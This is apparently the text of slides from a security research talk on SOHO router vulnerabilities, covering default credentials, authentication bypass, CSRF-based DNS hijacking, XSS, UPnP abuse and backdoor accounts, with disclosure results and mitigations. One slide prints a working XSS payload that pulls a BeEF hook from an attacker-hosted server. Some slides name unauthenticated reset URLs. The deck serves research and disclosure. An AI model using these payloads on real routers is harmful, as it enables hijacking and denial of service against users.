Destroying Router Security

2.
About us... Destroying RouterSecurity · NNC5ed2 Meet our research group Álvaro Folgado Rueda Independent Researcher José Antonio Rodríguez García Independent Researcher Iván Sanz de Castro Security Analyst at Wise Security Global.

3.
Main goals Destroying RouterSecurity · NNC5ed3 Search for vulnerability issues Explore innovative attack vectors Develop exploiting tools Build an audit methodology Evaluate the current security level of routers

4.
State of theart • Previous researches Destroying Router Security · NNC5ed4

5.

6.

7.

8.

9.

10.
State of theart • Real world attacks - Example 1 Destroying Router Security · NNC5ed5

11.
State of theart • Real world attacks - Example 2 Destroying Router Security · NNC5ed6

12.
Common security problems •Services • Too many. Mostly useless. • Increases attack surfaces • Insecure Destroying Router Security · NNC5ed7

13.
Common security problems •Default credentials • Public and well-known for each model • Non randomly generated Destroying Router Security · NNC5ed8 45% 27% 5% 5% 18% User / Password 1234 / 1234 admin / admin [blank] / admin admin / password vodafone / vodafone

14.
Common security problems •Default credentials • Hardly ever modified by users Destroying Router Security · NNC5ed9 “I don't remember what the password is. I have never changed it.” * Gives you a post-it with the Wi-Fi password * “Administrative password of... WHAT?” “Oh!, so we have one of those (routers)?” Users' response when asked about router passwords Best-case scenario Worst-case scenario

15.
Common security problems •Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Destroying Router Security · NNC5ed10

16.
Common security problems •Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Destroying Router Security · NNC5ed10

17.
Bypass Authentication • Allowsunauthenticated attackers to carry out router configuration changes • Locally and remotely • Exploits: • Improper file permissions • Service misconfiguration Destroying Router Security · NNC5ed11

18.
Bypass Authentication • Webconfiguration interface • Permanent Denial of Service • By accessing /rebootinfo.cgi • Reset to default configuration settings • By accessing /restoreinfo.cgi • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized) • But spamming gets the job done! Destroying Router Security · NNC5ed12 Video Demo #1 • Persistent DoS / Restore router to default settings without requiring authentication

19.
Bypass Authentication • SMB •Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Destroying Router Security · NNC5ed13

20.
Bypass Authentication • SMB •Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Destroying Router Security · NNC5ed13

21.
Bypass Authentication • TwonkyMedia Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Destroying Router Security · NNC5ed14

22.
Bypass Authentication • TwonkyMedia Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Destroying Router Security · NNC5ed14

23.
Cross Site RequestForgery • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Destroying Router Security · NNC5ed15

24.

25.

26.

27.
Cross Site RequestForgery • Suspicious link, isn't it? • URL Shortening Services • Create a malicious website Destroying Router Security · NNC5ed16

28.
Persistent Cross SiteScripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Destroying Router Security · NNC5ed17

29.
Persistent Cross SiteScripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Destroying Router Security · NNC5ed17

30.
Persistent Cross SiteScripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Destroying Router Security · NNC5ed18

31.
Persistent Cross SiteScripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Destroying Router Security · NNC5ed18

32.
Unauthenticated Cross SiteScripting • Script code injection is performed locally without requiring any login process • Send a DHCP Request PDU containing the malicious script within the hostname parameter • The malicious script is injected within Connected Clients (DHCP Leases) table Destroying Router Security · NNC5ed19

33.
Unauthenticated Cross SiteScripting Destroying Router Security · NNC5ed20

34.
Unauthenticated Cross SiteScripting Destroying Router Security · NNC5ed20

35.
Unauthenticated Cross SiteScripting • Sometimes it is a little bit harder... Destroying Router Security · NNC5ed21

36.
Unauthenticated Cross SiteScripting • Sometimes it is a little bit harder... Destroying Router Security · NNC5ed21

37.
Unauthenticated Cross SiteScripting • Or even next level... • But it works! Destroying Router Security · NNC5ed22

38.
Privilege Escalation • Userwithout administrator rights is able to escalate privileges and become an administrator • Shows why multiple user accounts are unsafe Destroying Router Security · NNC5ed23 Video Demo #2 • Privilege Escalation via FTP

39.
Backdoor • Hidden administratoraccounts • Completely invisible to end users • But allows attackers to change any configuration setting Destroying Router Security · NNC5ed24

40.
Backdoor • Hidden administratoraccounts • Completely invisible to end users • But allows attackers to change any configuration setting Destroying Router Security · NNC5ed24

41.
Information Disclosure • Obtaincritical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Destroying Router Security · NNC5ed25

42.
Information Disclosure • Obtaincritical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Destroying Router Security · NNC5ed25

43.
Information Disclosure Destroying RouterSecurity · NNC5ed26

44.

45.

46.
Universal Plug andPlay • Enabled by default on several router models • Allows application to execute network configuration changes such as opening ports • Extremely insecure protocol • Lack of an authentication process • Awful implementations • Goals • Open critical ports for remote WAN hosts • Persistent Denial of Service • Carry out other configuration changes Destroying Router Security · NNC5ed27

47.
Universal Plug andPlay • Locally • Miranda UPnP tool Destroying Router Security · NNC5ed28

48.

49.

50.
Universal Plug andPlay Destroying Router Security · NNC5ed29

51.

52.

53.

54.
Universal Plug andPlay • Remotely • Malicious SWF file Destroying Router Security · NNC5ed30

55.
Attack vectors • Locally •Attacker is connected to the victim's LAN either using an Ethernet cable or wirelessly • Remotely • The attacker is outside of the victim's LAN Destroying Router Security · NNC5ed31

56.
Social Engineering isyour friend • For link-based remote attacks • XSS, CSRF and UPnP • Social Networks = Build the easiest botnet ever! • Phishing emails = Targeted attacks Destroying Router Security · NNC5ed32

57.

58.

59.

60.
Destroying Router Security· NNC5ed33 Live Demo #1 • DNS Hijacking via CSRF Live Demo #2 • Bypass Authentication using SMB Symlinks • Unauthenticated Cross Site Scripting via DHCP Request Live Demo #3

61.
Developed tools Destroying RouterSecurity · NNC5ed34

62.
Developed tools Destroying RouterSecurity · NNC5ed35

63.
7 3 1 No reply "Not ourproblem" Other Manufacturers' response • Average 2-3 emails sent to each manufacturer • Most of them unreplied... 6 months later • Number of vulnerabilities fixed: 0 Destroying Router Security · NNC5ed36

64.
Manufacturers' response • Average2-3 emails sent to each manufacturer • Most of them unreplied... 6 months later • Number of vulnerabilities fixed: 0 Destroying Router Security · NNC5ed36

65.
Mitigations • For endusers • Change your router's administrative password • Try to delete any other administrative account • At least, change their passwords • Update the firmware... • ... after spamming your manufacturer to fix the vulnerabilities • Do not trust shortened links • Disable UPnP. It's evil • Disable any other unused services Destroying Router Security · NNC5ed37

66.
Mitigations • For manufacturers •Listen to what security researchers have to say • Do not include useless services • Specially for ISP SOHO routers • At least, make it feasible to completely shut them down • Critical ports closed to WAN by default • At least: 21, 22, 23, 80 and 8000/8080 • Randomly generate user credentials • Do not include multiple user accounts • Avoid using unsafe protocols (HTTP, telnet and FTP) • Design a safer alternative to UPnP Destroying Router Security · NNC5ed38

67.
Mitigations • For manufacturers •XSS • Check every input field within router's web interface • Sanitize DHCP hostname parameters • Content Security Policies • CSRF • Tokens... that work • Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages • Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB) Destroying Router Security · NNC5ed39

68.
Mitigations • For manufacturers •XSS • Check every input field within router's web interface • Sanitize DHCP hostname parameters • Content Security Policies • CSRF • Tokens... that work • Bypass Authentication & Information Disclosure • Check for improper file permissions and public debug messages • Service-related • Check for possible wrong service configuration (e.g.: FTP, SMB) Destroying Router Security · NNC5ed39

69.
Results • More than60 vulnerabilities have been discovered • 22 router models affected • 11 manufacturers affected Destroying Router Security · NNC5ed40

70.
Destroying Router Security· NNC5ed41 0 2 4 6 8 10 12 14 16 18 Disclosed vulnerabilities per manufacturer Número de routers afectados Vulnerabilidades totales encontradasNumber of disclosed vulnerabilitiesNumber of affected routers

71.
Destroying Router Security· NNC5ed42 21% 15% 20% 8% 2% 3% 2% 6% 23% XSS Unauthenticated XSS CSRF Denial of Service Privilege Escalation Information Disclosure Backdoor Bypass Authentication UPnP Vulnerabilities by types

72.
Destroying Router Security· NNC5ed43 Router XSS Unauth. XSS CSRF DoS Privilege Escalation Info. Disclosure Backdoor Bypass Auth. UPnP Observa Telecom AW4062 Vuln. - Vuln. Vuln. Vuln. - - - - Comtrend WAP-5813n Vuln. - Vuln. - - - - - Vuln. Comtrend CT-5365 Vuln. Vuln. Vuln. - - - - - Vuln. D-Link DSL2750B - - - - - Vuln. - - Vuln. Belkin F5D7632-4 - - Vuln. Vuln. - - - - Vuln. Sagem LiveBox Pro 2 SP Vuln. - - - - - - - Vuln. Amper Xavi 7968/+ - Vuln. - - - - - - Vuln. Sagem F@st 1201 - Vuln. - - - - - - - Linksys WRT54GL - Vuln. - - - - - - - Observa Telecom RTA01N Vuln. Vuln. Vuln. Vuln. - - Vuln. - Vuln. Observa Telecom BHS-RTA - - - - - Vuln. - - Vuln. Observa Telecom VH4032N Vuln. - Vuln. - - - - Vuln. Vuln. Huawei HG553 Vuln. - Vuln. Vuln. - - - Vuln. Vuln. Huawei HG556a Vuln. Vuln. Vuln. Vuln. - - - Vuln. Vuln. Astoria ARV7510 - - Vuln. - - - - Vuln. - Amper ASL-26555 Vuln. Vuln. Vuln. - - - - Vuln. Comtrend AR-5387un Vuln. Vuln. - - - - - - - Netgear CG3100D Vuln. - Vuln. - - - - - - Comtrend VG-8050 Vuln. Vuln. - - - - - - - Zyxel P 660HW-B1A Vuln. - Vuln. - - - - - - Comtrend 536+ - - - - - - - - Vuln. D-Link DIR-600 - - - - - - - - Vuln.

73.
Responsible Disclosure Destroying RouterSecurity · NNC5ed44

74.

75.

76.

77.

78.

79.
Conclusion • Has SOHOrouter security improved? • Hell NO! • Serious security problems • Easy to exploit • With huge impact • Millions of users affected • PLEASE, START FIXING SOHO ROUTER SECURITY • NOW! Destroying Router Security · NNC5ed45

80.
TL;DR Destroying Router Security· NNC5ed46

81.
TL;DR Destroying Router Security· NNC5ed46

82.
Álvaro Folgado Rueda· alvfolrue@gmail.com José A. Rodríguez García · joseantorodriguezg@gmail.com Iván Sanz de Castro · ivan.sanz.dcastro@gmail.com Destroying Router Security · NNC5ed47 Thank you! Q&A Time

Destroying Router Security

More Related Content

What's hot

Viewers also liked

Similar to Destroying Router Security

Recently uploaded

Destroying Router Security